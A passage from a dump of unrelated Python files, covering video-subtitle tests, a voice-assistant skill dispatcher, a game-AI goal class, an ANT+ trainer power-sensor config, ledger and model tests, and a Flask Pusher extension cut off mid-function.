file1_srt = os.path.join(input_dir, 'file1.eng.srt')
file2_srt = os.path.join(input_dir, 'file2.spa.srt')
create_test_video(length=3, output_file=file1)
create_test_video(length=3, output_file=file2)
create_test_video(length=3, output_file=file3)
with open(file1_srt, 'w') as f:
f.write(SRT_TEXT)
with open(file2_srt, 'w') as f:
f.write(SRT_TEXT)
files = list(get_combinable_files(input_dir, output_dir))
self.assertEqual((file1, file1_srt, 'eng', os.path.join(output_dir, 'file1.mkv')), files[0])
self.assertEqual((file2, file2_srt, 'spa', os.path.join(output_dir, 'file2.mkv')), files[1])
self.assertEqual((file3, None, None, os.path.join(output_dir, 'file3.mkv')), files[2])
def test_combine_all(self):
with TemporaryDirectory() as input_dir, TemporaryDirectory() as output_dir:
create_test_video(length=3, output_file=os.path.join(input_dir, 'file1.mkv'))
create_test_video(length=3, output_file=os.path.join(input_dir, 'file2.mkv'))
create_test_video(length=3, output_file=os.path.join(input_dir, 'file3.mkv'))
with open(os.path.join(input_dir, 'file1.eng.srt'), 'w') as f:
f.write(SRT_TEXT)
with open(os.path.join(input_dir, 'file2.spa.srt'), 'w') as f:
f.write(SRT_TEXT)
combine_all(get_combinable_files(input_dir, output_dir))
out1 = os.path.join(output_dir, 'file1.mkv')
out2 = os.path.join(output_dir, 'file2.mkv')
self.assertTrue(os.path.isfile(out1))
self.assertTrue(os.path.isfile(out2))
self.assertFalse(os.path.isfile(os.path.join(output_dir, 'file3.mkv')))
self._validate_file(out1)
self._validate_file(out2, 'spa')
|
1708728
|
import os.path
from fabric.state import env
def run_capture(out = []):
"""Helper for retriving env.run issued commands"""
return lambda command, *args, **kwargs: out.append(command.strip())
class CdPlaceholder(object):
def __enter__(self, *args, **kwargs):
return True
def __exit__(self, type, value, traceback):
return False
def cd_capture(out = []):
def cd(command):
command = command.strip()
out.append('cd {}'.format(command))
return CdPlaceholder()
return cd
def empty_copy():
"""
    A stub copy method that does nothing more than create a .txt file.
"""
source_path = os.path.join(env.current_release, "src")
env.run("mkdir -p %s" % source_path)
env.run("touch %s/app.txt" % source_path)
|
1708740
|
import json
import logging
from abc import abstractmethod
from json import dumps as json_dumps
from typing import List, Callable, Any, Optional
from inoft_vocal_framework.dummy_object import DummyObject
from inoft_vocal_framework.exceptions import raise_if_value_not_in_list, raise_if_variable_not_expected_type
from inoft_vocal_framework.platforms_handlers.endpoints_providers.providers import LambdaResponseWrapper
from inoft_vocal_framework.platforms_handlers.handler_input import HandlerInput, HandlerInputWrapper
from inoft_vocal_framework.plugins.loader import plugins_load
# todo: Add prod and dev modes, so that optional steps (like loading of plugins) are done only in development
# todo: Add a class with only a CanHandle function (for cases like the classical Yes and No handlers)
from inoft_vocal_framework.skill_settings.skill_settings import Settings
def canProcessIntentNames(intents_names: List[str]):
print(intents_names)
# todo: finish the canProcessIntentNames
def decorator(class_instance: Any):
"""def wrapper(*args, **kwargs):
return None
wrapper()"""
try:
class_instance_bases = class_instance.__bases__
if InoftStateHandler in class_instance_bases:
print("should add state handler to skill switch")
elif InoftRequestHandler in class_instance_bases:
print("should add request handler to skill switch")
# return wrapper
except Exception as e:
print(e)
finally:
return class_instance
return decorator
class InoftCondition(HandlerInputWrapper):
@abstractmethod
def can_handle(self) -> bool:
""" Returns true if Request Handler can handle the Request inside Handler Input.
:return: Boolean value that tells the dispatcher if the current request can be handled by this handler.
:rtype: bool
"""
raise NotImplementedError
class InoftHandler(HandlerInputWrapper):
@abstractmethod
def handle(self) -> dict:
"""Handles the Request inside handler input and provides a Response for dispatcher to return.
:return: Response for the dispatcher to return or None
:rtype: Union[Response, None]
"""
raise NotImplementedError
@abstractmethod
def handle_resume(self) -> dict:
        # todo: make the handle resume function functional for the handler (cannot use a chain, but need to
# use a class path, that will be saved in the database)
print(f"Resuming an user session, but no logic has been found in the handle_resume function, defaulting to the handle function")
class InoftRequestHandler(HandlerInputWrapper):
@abstractmethod
def can_handle(self) -> bool:
""" Returns true if Request Handler can handle the Request inside Handler Input.
:return: Boolean value that tells the dispatcher if the current request can be handled by this handler.
:rtype: bool
"""
raise NotImplementedError
@abstractmethod
def handle(self) -> dict:
"""Handles the Request inside handler input and provides a Response for dispatcher to return.
:return: Response for the dispatcher to return or None
:rtype: Union[Response, None]
"""
raise NotImplementedError
@abstractmethod
def handle_resume(self) -> dict:
print(f"Resuming an user session, but no logic has been found in the handle_resume function, defaulting to the handle function")
class InoftStateHandler(HandlerInputWrapper):
# todo: make it possible for a state or request handler to be a nested class inside another one
@abstractmethod
def handle(self) -> dict:
"""Handles the Request inside handler input and provides a Response for dispatcher to return.
:return: Response for the dispatcher to return or None
:rtype: Union[Response, None]
"""
raise NotImplementedError
@abstractmethod
def fallback(self) -> dict:
""" Handler if no response has been gotten from the handle method.
:return: Response for the dispatcher to return or None
:rtype: Union[Response, None]
"""
return self.handle()
@abstractmethod
def handle_resume(self):
print(f"Resuming an user session, but no logic has been found in the handle_resume function, defaulting to the handle function")
class InoftDefaultFallback(HandlerInputWrapper):
@abstractmethod
def handle(self) -> dict:
raise NotImplementedError
class InoftHandlersGroup:
@abstractmethod
def __getattr__(self, item):
self_vars = vars(self)
if item in self_vars:
return self_vars[item]
else:
return DummyObject()
def handle(self) -> dict:
for var_key, var_object in vars(self).items():
if InoftRequestHandler in list(var_object.__class__.__bases__):
if var_object.can_handle() is True:
handler_output = var_object.handle()
if handler_output is not None:
return handler_output
class InoftSkill:
APP_SETTINGS: Settings
def __init__(self, settings_instance: Settings = None):
self.settings = settings_instance
self.plugins = plugins_load(settings=self.settings)
# todo: reactivate plugins
InoftSkill.APP_SETTINGS = self.settings
self._request_handlers_chain = dict()
self._state_handlers_chain = dict()
self._default_fallback_handler = None
self._handler_input = HandlerInput(settings_instance=settings_instance)
self.on_interaction_start: List[Callable[[], Any]] = []
self.on_interaction_end: List[Callable[[], Any]] = []
self.settings.user_data_plugin.register_plugin(skill=self)
# todo: add better plugin registration system
@property
def settings(self) -> Settings:
return self._settings
@settings.setter
def settings(self, settings: Settings) -> None:
raise_if_variable_not_expected_type(value=settings, expected_type=Settings, variable_name="settings")
self._settings = settings
def add_request_handler(self, request_handler_instance_or_class) -> None:
if request_handler_instance_or_class is not None:
try:
if isinstance(request_handler_instance_or_class, type):
# If the variable is a class object we create an instance of the class
handler_bases_parent_classes = request_handler_instance_or_class.__bases__
request_handler_instance_or_class = request_handler_instance_or_class()
else:
# If the variable is a class instance
handler_bases_parent_classes = request_handler_instance_or_class.__class__.__bases__
if InoftRequestHandler in handler_bases_parent_classes:
request_handler_instance_or_class.handler_input = self.handler_input
# We set a reference to the skill handler_input in each handler so that it can use it with its HandlerInputWrapper
self.request_handlers_chain[request_handler_instance_or_class.__class__.__name__] = request_handler_instance_or_class
except Exception as e:
raise Exception(f"Error while adding a request handler. Please make sure it is a {InoftRequestHandler} class object : {e}")
else:
raise Exception(f"The following request handler is not a valid handler or do not have "
f"{InoftRequestHandler.__name__} as its MetaClass : {request_handler_instance_or_class}")
def add_state_handler(self, state_handler_instance_or_class) -> None:
if state_handler_instance_or_class is not None:
try:
if isinstance(state_handler_instance_or_class, type):
# If the variable is a class object we create an instance of the class
handler_bases_parent_classes = state_handler_instance_or_class.__bases__
state_handler_instance_or_class = state_handler_instance_or_class()
else:
# If the variable is a class instance
handler_bases_parent_classes = state_handler_instance_or_class.__class__.__bases__
if InoftStateHandler in handler_bases_parent_classes:
state_handler_instance_or_class.handler_input = self.handler_input
# We set a reference to the skill handler_input in each handler so that it can use it with its HandlerInputWrapper
self.state_handlers_chain[state_handler_instance_or_class.__class__.__name__] = state_handler_instance_or_class
except Exception as e:
raise Exception(f"Error while adding a state handler. Please make sure it is a {InoftStateHandler} class object : {e}")
else:
raise Exception(f"The following state handler is not a valid handler or do not have "
f"{InoftStateHandler.__name__} as its MetaClass : {state_handler_instance_or_class}")
def set_default_fallback_handler(self, default_fallback_handler_instance_or_class) -> None:
if default_fallback_handler_instance_or_class is not None:
try:
if isinstance(default_fallback_handler_instance_or_class, type):
# If the variable is a class object we create an instance of the class
handler_bases_parent_classes = default_fallback_handler_instance_or_class.__bases__
default_fallback_handler_instance_or_class = default_fallback_handler_instance_or_class()
else:
# If the variable is a class instance
handler_bases_parent_classes = default_fallback_handler_instance_or_class.__class__.__bases__
if InoftDefaultFallback in handler_bases_parent_classes:
default_fallback_handler_instance_or_class.handler_input = self.handler_input
# We set a reference to the skill handler_input in each handler so that it can use it with its HandlerInputWrapper
self.default_fallback_handler = default_fallback_handler_instance_or_class
except Exception as e:
raise Exception(f"Error while adding a request handler. Please make sure it is a {InoftDefaultFallback} class object : {e}")
else:
raise Exception(f"The following fallback handler is not a valid handler or do not have "
f"{InoftDefaultFallback.__name__} as its MetaClass : {default_fallback_handler_instance_or_class}")
def process_request(self):
output_event = None
handler_to_use = None
handler_is_an_alone_callback_function = False
handler_is_an_audioplayer_handlers_group = False
handler_is_a_then_state_handler = False
handler_is_a_request_handler = False
        # If an UPDATES_USER_ID has been found on the Google Assistant platform, we save it in the user data.
if self.handler_input.is_dialogflow is True:
current_updates_user_id = self.handler_input.dialogFlowHandlerInput.request.get_updates_user_id_if_present()
if current_updates_user_id is not None:
remembered_updates_user_id = self.handler_input.persistent_remember("updatesUserId", str)
if current_updates_user_id != remembered_updates_user_id:
self.handler_input.persistent_memorize("updatesUserId", current_updates_user_id)
# Steps of priority
# Discord override
if self.handler_input.is_discord is True:
if not len(self.request_handlers_chain) > 0:
raise Exception(f"No request handlers have been found !!!!!")
else:
handler_to_use = list(self.request_handlers_chain.values())[0]
# First, if the request is an interactive option made by the user
if self.handler_input.need_to_be_handled_by_callback():
infos_callback_function_to_use = self.handler_input.interactivity_callback_functions.get(
self.handler_input.selected_option_identifier
).to_safedict(default=None)
if infos_callback_function_to_use is not None:
from inoft_vocal_framework.skill_builder import get_function_or_class_from_file_and_path
handler_to_use = get_function_or_class_from_file_and_path(
file_filepath=infos_callback_function_to_use.get("file_filepath_containing_callback").to_str(),
path_qualname=infos_callback_function_to_use.get("callback_function_path").to_str())
if handler_to_use is not None:
handler_is_an_alone_callback_function = True
# Second, Alexa Audio Player
if self.handler_input.is_alexa:
if (
self.handler_input.alexaHandlerInput.context.audioPlayer is not None and
self.handler_input.alexaHandlerInput.context.audioPlayer.token is not None
):
last_used_audioplayer_handlers_group_infos = self.handler_input.alexaHandlerInput.get_last_used_audioplayer_handlers_group()
from inoft_vocal_framework.skill_builder import get_function_or_class_from_file_and_path
audioplayer_handlers_group_class_type = get_function_or_class_from_file_and_path(
file_filepath=last_used_audioplayer_handlers_group_infos.get("fileFilepathContainingClass").to_str(),
path_qualname=last_used_audioplayer_handlers_group_infos.get("classPath").to_str())
if audioplayer_handlers_group_class_type is not None:
raise_if_value_not_in_list(value=InoftHandlersGroup, list_object=list(audioplayer_handlers_group_class_type.__bases__),
variable_name="audioplayer_handlers_group_class_type")
class_kwargs = last_used_audioplayer_handlers_group_infos.get("classKwargs").to_dict()
class_kwargs["parent_handler"] = self
handler_to_use = audioplayer_handlers_group_class_type(**class_kwargs)
                    # When using an audioplayer handlers group, we call its handle function (it will try each of its
                    # handlers until it finds one that returns an output). If the output is None (none of the functions
                    # of the audioplayer handlers group returned anything), we set handler_to_use back to None,
                    # so that the other, more traditional handlers get a chance to be used (if we did not do that, and
                    # no event was returned, the response would be the default fallback right away).
                    # The reason for all of this is that if the AudioPlayer object is present, but not in a state that is
                    # supported by the app through a can_handle function (for example if it is stopped, and no can_handle
                    # function of any class is triggered by the current state of the AudioPlayer), then we will not be able
                    # to give an interactive experience with the AudioPlayer, which translates into our output_event being None.
output_event = handler_to_use.handle()
if output_event is not None:
handler_is_an_audioplayer_handlers_group = True
else:
handler_to_use = None
# Third, if the invocation is a new session, and a session can be resumed, we resume the last intent of the previous session
if self.handler_input.is_invocation_new_session is True and self.handler_input.session_been_resumed is True:
last_intent_handler_class_key_name: Optional[str] = self.handler_input.user_data.get_field(field_path='lastIntentHandler')
if last_intent_handler_class_key_name in self.request_handlers_chain.keys():
handler_to_use = self.request_handlers_chain[last_intent_handler_class_key_name]
elif last_intent_handler_class_key_name in self.state_handlers_chain.keys():
handler_to_use = self.state_handlers_chain[last_intent_handler_class_key_name]
# Fourth, loading of the then_state in the session
if handler_to_use is None:
last_then_state_class_name = self.handler_input.remember_session_then_state()
if last_then_state_class_name is not None:
if last_then_state_class_name in self.state_handlers_chain.keys():
handler_to_use = self.state_handlers_chain[last_then_state_class_name]
handler_is_a_then_state_handler = True
self.handler_input.forget_session_then_state()
else:
logging.warning(f"A thenState class name ({last_then_state_class_name}) was not None and has"
f" not been found in the available classes : {self.state_handlers_chain}")
# Fifth, classical requests handlers
if handler_to_use is None:
for request_handler in self.request_handlers_chain.values():
if request_handler.can_handle() is True:
handler_to_use = request_handler
handler_is_a_request_handler = True
break
else:
logging.debug(f"Not handled by : {request_handler.__class__}")
if handler_to_use is not None:
if handler_is_an_alone_callback_function is True:
output_event = handler_to_use(self.handler_input, self.handler_input.selected_option_identifier)
if output_event is not None:
logging.debug(f"Successfully resumed by {handler_to_use} which returned {output_event}")
else:
logging.info(f"A callback function has been found {handler_to_use}. But nothing was returned,"
f" did you called the return self.to_platform_dict() function ?")
if output_event is None and self.handler_input.session_been_resumed is True:
logging.debug(f"Handled and resumed by : {handler_to_use.__class__}")
output_event = handler_to_use.handle_resume()
if output_event is None:
logging.debug(f"Handled classically by : {handler_to_use.__class__}")
output_event = handler_to_use.handle()
if handler_is_a_then_state_handler is True and output_event is None:
                # If the handle function of a then_state handler does not return anything, we call its fallback
                # function, and we set the then_state back in the session attributes (we do so before calling
                # the fallback, in case the fallback function changes the then_state)
self.handler_input.memorize_session_then_state(state_handler_class_type_or_name=last_then_state_class_name)
output_event = handler_to_use.fallback()
if output_event is not None:
if handler_is_an_alone_callback_function is False and handler_is_an_audioplayer_handlers_group is False:
                    # If the response is handled by a function, we do not save it as the last intent (we cannot actually,
                    # and it would not make sense anyway). So we keep the previous last intent as the new last intent.
                    # We do the same thing when it is handled by an audioplayer handlers group (since it is used to handle interactions too)
self.handler_input.memorize_session_last_intent_handler(handler_class_type_instance_name=handler_to_use)
else:
logging.debug(f"Handler by default fallback : {self.default_fallback_handler}")
output_event = self.default_fallback_handler.handle()
for callback in self.on_interaction_end:
callback()
if self.handler_input.is_discord is not True:
print(f"output_event = {output_event}")
wrapped_output_event = LambdaResponseWrapper(response_dict=output_event).get_wrapped(handler_input=self.handler_input)
return wrapped_output_event
else:
return None
def check_everything_implemented(self):
if self.default_fallback_handler is None:
raise Exception(f"A skill must have a {InoftDefaultFallback} handler set with the {self.set_default_fallback_handler} function.")
@staticmethod
def _get_alexa_application_id_from_event(event: dict) -> Optional[str]:
context: Optional[dict] = event.get('context', None)
if context is not None:
system: Optional[dict] = context.get('System', None)
if system is not None:
application: Optional[dict] = system.get('application', None)
if application is not None:
return application.get('applicationId', None)
return None
def handle_any_platform(self, event: dict, context: dict):
from inoft_vocal_framework.platforms_handlers.discord.handler_input import DiscordHandlerInput
print(f"Crude event = {event if not isinstance(event, dict) else json_dumps(event)}\nCrude context = {context}")
self.check_everything_implemented()
# The 'rawPath' is for ApiGatewayV2, use the key 'resource' (without the comma) if using ApiGatewayV1
event_raw_path: Optional[str] = event.get('rawPath', None)
if event_raw_path == '/googleAssistantDialogflowV1':
            # A google-assistant or dialogflow request always passes through an API gateway
self.handler_input.set_platform_to_dialogflow()
event_body: Optional[dict or str] = event.get('body', None)
if event_body is None:
raise Exception("Event body not found")
event: dict = event_body if isinstance(event_body, dict) else json.loads(event_body)
print(f"Event body for Google Assistant = {json_dumps(event)}")
elif event_raw_path == "/samsungBixbyV1":
            # A samsung bixby request always passes through an API gateway
self.handler_input.set_platform_to_bixby()
event_body: Optional[dict] = event.get('body', None)
if event_body is None:
raise Exception("Event body not found")
from urllib import parse
event_raw_query_string: Optional[str] = event.get('rawQueryString', None)
parameters: dict = dict(parse.parse_qsl(event_raw_query_string)) if event_raw_query_string is not None else {}
event = {'context': event_body.get('$vivContext'), 'parameters': parameters}
print(f"Event body for Samsung Bixby = {json_dumps(event)}")
elif "amzn1." in (self._get_alexa_application_id_from_event(event=event) or ""):
            # Alexa always goes last, since it does not pass through an API resource; its identification is less robust than on the other platforms.
self.handler_input.set_platform_to_alexa()
print(f"Event body do not need processing for Alexa : {event}")
elif DiscordHandlerInput.SHOULD_BE_USED is True:
self.handler_input.set_platform_to_discord()
print(f"Event body does not need processing for Discord : {event}")
else:
from inoft_vocal_framework.messages import ERROR_PLATFORM_NOT_SUPPORTED
raise Exception(ERROR_PLATFORM_NOT_SUPPORTED)
self.handler_input.load_event(event=event)
return self.process_request()
@property
def request_handlers_chain(self) -> dict:
return self._request_handlers_chain
@property
def state_handlers_chain(self) -> dict:
return self._state_handlers_chain
@property
def default_fallback_handler(self):
return self._default_fallback_handler
@default_fallback_handler.setter
def default_fallback_handler(self, default_fallback_handler) -> None:
self._default_fallback_handler = default_fallback_handler
@property
def handler_input(self) -> HandlerInput:
return self._handler_input
@property
def default_session_data_timeout(self):
return self._handler_input.default_session_data_timeout
@default_session_data_timeout.setter
def default_session_data_timeout(self, default_session_data_timeout: int) -> None:
if not isinstance(default_session_data_timeout, int):
raise Exception(f"default_session_data_timeout was type {type(default_session_data_timeout)} which is not a valid value for this parameter.")
self.handler_input._default_session_data_timeout = default_session_data_timeout
|
1708753
|
from abc import ABCMeta, abstractmethod
class Goal(metaclass=ABCMeta):
INACTIVE = 0
ACTIVE = 1
COMPLETED = 2
FAILED = 3
def __init__(self, owner):
self.owner = owner
self.status = self.INACTIVE
@abstractmethod
def activate(self):
pass
@abstractmethod
def process(self):
pass
@abstractmethod
def terminate(self):
pass
def handleMessage(self, msg):
return False
def add_subgoal(self, goal):
raise NotImplementedError('Cannot add goals to atomic goals')
def reactivateIfFailed(self):
if self.status == self.FAILED:
self.status = self.INACTIVE
def activateIfInactive(self):
if self.status == self.INACTIVE:
self.status = self.ACTIVE
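# A minimal sketch (not part of the original module) showing how the Goal state machine
# above is meant to be subclassed: activate() moves the goal to ACTIVE, process() advances
# it and reports the current status, and terminate() cleans up. The WaitGoal name and its
# tick-counting behaviour are illustrative assumptions.
class WaitGoal(Goal):
    def __init__(self, owner, ticks):
        super(WaitGoal, self).__init__(owner)
        self.ticks_left = ticks

    def activate(self):
        self.status = self.ACTIVE

    def process(self):
        # re-activate if needed, then count down until the wait is over
        self.activateIfInactive()
        self.ticks_left -= 1
        if self.ticks_left <= 0:
            self.status = self.COMPLETED
        return self.status

    def terminate(self):
        pass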
|
1708769
|
from __future__ import absolute_import
from .._hook import import_hook
@import_hook(__name__)
def value_processor(name, raw_name, raw_value):
import json
try:
value = json.loads(raw_value)
except ValueError:
error_msg = (
'{0}={1!r} found but {1!r} is not a valid json value.\n\n'
'You may want {0}=\'"{1}"\' if the value should be a string.')
raise ImportError(error_msg.format(raw_name, raw_value))
return value
del import_hook
del value_processor
|
1708823
|
from configparser import ConfigParser
import os, sys
from ant.core import log
from BtAtsPowerCalculator import BtAtsPowerCalculator
from CycleOpsFluid2PowerCalculator import CycleOpsFluid2PowerCalculator
from EliteNovoForceS3PowerCalculator import EliteNovoForceS3PowerCalculator
from GenericFluidPowerCalculator import GenericFluidPowerCalculator
from GenericMagneticPowerCalculator import GenericMagneticPowerCalculator
from KurtKineticPowerCalculator import KurtKineticPowerCalculator
from LinearInterpolationPowerCalculator import LinearInterpolationPowerCalculator
from TacxBlueMotionPowerCalculator import TacxBlueMotionPowerCalculator
from constants import *
import hashlib
if getattr(sys, 'frozen', False):
# If we're running as a pyinstaller bundle
SCRIPT_DIR = os.path.dirname(sys.executable)
else:
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
VPOWER_DEBUG = False
# ANT+ ID of the virtual power sensor
# The expression below will choose a fixed ID based on the CPU's serial number
POWER_SENSOR_ID = int(int(hashlib.md5(getserial().encode()).hexdigest(), 16) & 0xfffe) + 1
# Set to None to disable ANT+ message logging
LOG = None
# LOG = log.LogWriter(filename="vpower.log")
# ANT+ network key
NETKEY = b'\<KEY>'
if LOG:
print("Using log file:", LOG.filename)
print("")
_CONFIG_FILENAME = os.path.join(SCRIPT_DIR, 'vpower.cfg')
if os.path.isfile(_CONFIG_FILENAME):
CONFIG = ConfigParser()
SECTION = 'vpower'
if VPOWER_DEBUG: print('Read config file')
CONFIG.read(_CONFIG_FILENAME)
if VPOWER_DEBUG: print('Get config items')
# Type of sensor connected to the trainer
SENSOR_TYPE = CONFIG.getint(SECTION, 'speed_sensor_type')
# ANT+ ID of the above sensor
SPEED_SENSOR_ID = CONFIG.getint(SECTION, 'speed_sensor_id')
# Calculator for the model of turbo
pc_class = globals()[CONFIG.get(SECTION, 'power_calculator')]
POWER_CALCULATOR = pc_class()
# For wind/air trainers, current air density in kg/m3 (if not using a BME280 weather sensor)
POWER_CALCULATOR.air_density = CONFIG.getfloat(SECTION, 'air_density')
# For wind/air trainers, how often (secs) to update the air density if there *is* a BME280 present
POWER_CALCULATOR.air_density_update_secs = CONFIG.getfloat(SECTION, 'air_density_update_secs')
# For tyre-driven trainers, the wheel circumference in meters (2.122 for Continental Home trainer tyre)
POWER_CALCULATOR.wheel_circumference = CONFIG.getfloat(SECTION, 'wheel_circumference')
# Overall correction factor, e.g. to match a user's power meter on another bike
POWER_CALCULATOR.set_correction_factor(CONFIG.getfloat(SECTION, 'correction_factor'))
# If set to True, the stick's driver will dump everything it reads/writes from/to the stick.
DEBUG = CONFIG.getboolean(SECTION, 'debug')
else:
if VPOWER_DEBUG: print('Config file not found, using default values')
SENSOR_TYPE = 123
SPEED_SENSOR_ID = 0
POWER_CALCULATOR = LinearInterpolationPowerCalculator()
POWER_CALCULATOR.air_density = 1.191
POWER_CALCULATOR.air_density_update_secs = 10
POWER_CALCULATOR.wheel_circumference = 2.105
POWER_CALCULATOR.set_correction_factor(1.0)
DEBUG = VPOWER_DEBUG
POWER_CALCULATOR.set_debug(DEBUG)
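# Illustrative only: a minimal vpower.cfg matching the keys read above (the section name and
# keys come from this file; the values are placeholders, not recommendations).
#
# [vpower]
# speed_sensor_type = 123
# speed_sensor_id = 0
# power_calculator = KurtKineticPowerCalculator
# air_density = 1.191
# air_density_update_secs = 10
# wheel_circumference = 2.105
# correction_factor = 1.0
# debug = False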
|
1708830
|
class IDisposable:
""" Defines a method to release allocated resources. """
def Dispose(self):
"""
Dispose(self: IDisposable)
Performs application-defined tasks associated with freeing, releasing, or resetting unmanaged
resources.
"""
pass
def __enter__(self,*args):
"""
__enter__(self: IDisposable) -> object
Provides the implementation of __enter__ for objects which implement IDisposable.
"""
pass
def __exit__(self,*args):
"""
__exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object)
Provides the implementation of __exit__ for objects which implement IDisposable.
"""
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
|
1708831
|
from indy_node.test.did.conftest import nym_get
from indy_node.test.helper import sdk_rotate_verkey
def testAddDidWithoutAVerkey(nym_empty_vk):
pass
def testRetrieveEmptyVerkey(looper, tconf, nodeSet, sdk_pool_handle, sdk_wallet_trustee, nym_empty_vk):
nwh, ndid = nym_empty_vk
resp_data = nym_get(looper, sdk_pool_handle, sdk_wallet_trustee, ndid)
assert ndid == resp_data[0]
assert not resp_data[1]
def testChangeEmptyVerkeyToNewVerkey(looper, tconf, nodeSet, sdk_pool_handle, sdk_wallet_trustee, nym_empty_vk):
_, did = nym_empty_vk
trw, trd = sdk_wallet_trustee
new_vk = sdk_rotate_verkey(looper, sdk_pool_handle, trw, trd, did)
assert new_vk
def testRetrieveChangedVerkey(looper, tconf, nodeSet, sdk_pool_handle, sdk_wallet_trustee, nym_empty_vk):
_, did = nym_empty_vk
trw, trd = sdk_wallet_trustee
new_vk = sdk_rotate_verkey(looper, sdk_pool_handle, trw, trd, did)
resp_data = nym_get(looper, sdk_pool_handle, sdk_wallet_trustee, did)
assert did == resp_data[0]
assert new_vk == resp_data[1]
def testVerifySigWithChangedVerkey(looper, tconf, nodeSet, sdk_pool_handle, sdk_wallet_trustee, nym_empty_vk):
wh, did = nym_empty_vk
trw, trd = sdk_wallet_trustee
new_vk = sdk_rotate_verkey(looper, sdk_pool_handle, trw, trd, did)
# check the signature by getting the nym from the ledger - if it succeeds, the signature is ok
resp_data = nym_get(looper, sdk_pool_handle, (wh, did), did)
assert did == resp_data[0]
assert new_vk == resp_data[1]
|
1708858
|
import unittest
import super_gradients
from super_gradients.training import MultiGPUMode
from super_gradients.training import SgModel
from super_gradients.training.datasets.dataset_interfaces.dataset_interface import ClassificationTestDatasetInterface
from super_gradients.training.metrics import Accuracy
import os
import shutil
class PretrainedModelsUnitTest(unittest.TestCase):
def setUp(self) -> None:
super_gradients.init_trainer()
self.imagenet_pretrained_models = ["resnet50", "repvgg_a0", "regnetY800"]
self.test_dataset = ClassificationTestDatasetInterface(classes=range(1000))
def test_pretrained_resnet50_imagenet(self):
trainer = SgModel('imagenet_pretrained_resnet50_unit_test', model_checkpoints_location='local',
multi_gpu=MultiGPUMode.OFF)
trainer.connect_dataset_interface(self.test_dataset, data_loader_num_workers=8)
trainer.build_model("resnet50", checkpoint_params={"pretrained_weights": "imagenet"})
trainer.test(test_loader=self.test_dataset.val_loader, test_metrics_list=[Accuracy()],
metrics_progress_verbose=True)
def test_pretrained_regnetY800_imagenet(self):
trainer = SgModel('imagenet_pretrained_regnetY800_unit_test', model_checkpoints_location='local',
multi_gpu=MultiGPUMode.OFF)
trainer.connect_dataset_interface(self.test_dataset, data_loader_num_workers=8)
trainer.build_model("regnetY800", checkpoint_params={"pretrained_weights": "imagenet"})
trainer.test(test_loader=self.test_dataset.val_loader, test_metrics_list=[Accuracy()],
metrics_progress_verbose=True)
def test_pretrained_repvgg_a0_imagenet(self):
trainer = SgModel('imagenet_pretrained_repvgg_a0_unit_test', model_checkpoints_location='local',
multi_gpu=MultiGPUMode.OFF)
trainer.connect_dataset_interface(self.test_dataset, data_loader_num_workers=8)
trainer.build_model("repvgg_a0", checkpoint_params={"pretrained_weights": "imagenet"},
arch_params={"build_residual_branches": True})
trainer.test(test_loader=self.test_dataset.val_loader, test_metrics_list=[Accuracy()],
metrics_progress_verbose=True)
def tearDown(self) -> None:
if os.path.exists(os.path.expanduser('~/.cache/torch/hub/')):
    shutil.rmtree(os.path.expanduser('~/.cache/torch/hub/'))
if __name__ == '__main__':
unittest.main()
|
1708864
|
from flask import Blueprint, current_app, request, abort, json
import pusher as _pusher
from pusher.signature import sign, verify
try:
import flask_jsonpify
except ImportError: # pragma: no cover
from flask import jsonify
else:
jsonify = flask_jsonpify.jsonify
flask_jsonpify__dumps = flask_jsonpify.__dumps
def __dumps(*args, **kwargs):
indent = None
if current_app.config.get('JSONIFY_PRETTYPRINT_REGULAR', False):
indent = 2
return json.dumps(
args[0] if len(args) == 1 else dict(*args, **kwargs),
indent=indent
)
flask_jsonpify.__dumps = __dumps
class _Pusher(_pusher.Pusher):
"""
Pusher client wrapper to get attributes from `_pusher_client`
if the attribute does not exist.
Provide backward compatibility to `pusher>=1.6`.
"""
def __getattr__(self, attr):
client = self._pusher_client
return getattr(client, attr)
class Pusher(object):
def __init__(self, app=None, url_prefix="/pusher"):
self.app = app
self._auth_handler = None
self._channel_data_handler = None
self._blueprint = Blueprint('pusher', __name__, url_prefix=url_prefix)
self.webhooks = Webhooks(self)
if app is not None:
self.init_app(app)
def init_app(self, app):
# if config not defined, Pusher will fallback to default config
app.config.setdefault("PUSHER_APP_ID", '')
app.config.setdefault("PUSHER_KEY", '')
app.config.setdefault("PUSHER_SECRET", '')
app.config.setdefault("PUSHER_HOST", '')
app.config.setdefault("PUSHER_PORT", '')
app.config.setdefault("PUSHER_AUTH", '/auth')
pusher_kwargs = dict(
app_id=app.config["PUSHER_APP_ID"],
key=app.config["PUSHER_KEY"],
secret=app.config["PUSHER_SECRET"],
host=app.config["PUSHER_HOST"],
port=app.config["PUSHER_PORT"],
)
ssl = app.config.get('PUSHER_SSL')
if ssl is not None:
pusher_kwargs["ssl"] = ssl
timeout = app.config.get('PUSHER_TIMEOUT')
if timeout is not None:
pusher_kwargs["timeout"] = timeout
cluster = app.config.get('PUSHER_CLUSTER')
if cluster is not None:
pusher_kwargs["cluster"] = cluster
backend = app.config.get('PUSHER_BACKEND')
if backend is not None:
pusher_kwargs["backend"] = backend
notification_host = app.config.get('PUSHER_NOTIFICATION_HOST')
if notification_host is not None:
pusher_kwargs["notification_host"] = notification_host
notification_ssl = app.config.get('PUSHER_NOTIFICATION_SSL')
if notification_ssl is not None:
pusher_kwargs["notification_ssl"] = notification_ssl
encryption_master_key = app.config.get('PUSHER_ENCRYPTION_MASTER_KEY')
if encryption_master_key is not None:
pusher_kwargs["encryption_master_key"] = encryption_master_key
pusher_kwargs.update({
"json_encoder": getattr(app, "json_encoder", None),
"json_decoder": getattr(app, "json_decoder", None),
})
backend_options = app.config.get('PUSHER_BACKEND_OPTIONS')
if backend_options is not None:
pusher_kwargs.update(backend_options)
client = _Pusher(**pusher_kwargs)
self._make_blueprint(app.config["PUSHER_AUTH"])
app.register_blueprint(self._blueprint)
if not hasattr(app, "extensions"):
app.extensions = {}
app.extensions["pusher"] = client
@property
def client(self):
return current_app.extensions.get("pusher")
def auth(self, handler):
self._auth_handler = handler
return handler
def channel_data(self, handler):
self._channel_data_handler = handler
return handler
def _make_blueprint(self, auth_path):
bp = self._blueprint
@bp.route(auth_path, methods=["POST"])
def auth():
if not self._auth_handler:
abort(403)
socket_id = request.form["socket_id"]
channel_name = request.form.get("channel_name")
if channel_name:
response = self._auth_simple(socket_id, channel_name)
if not response:
abort(403)
else:
response = self._auth_buffered(socket_id)
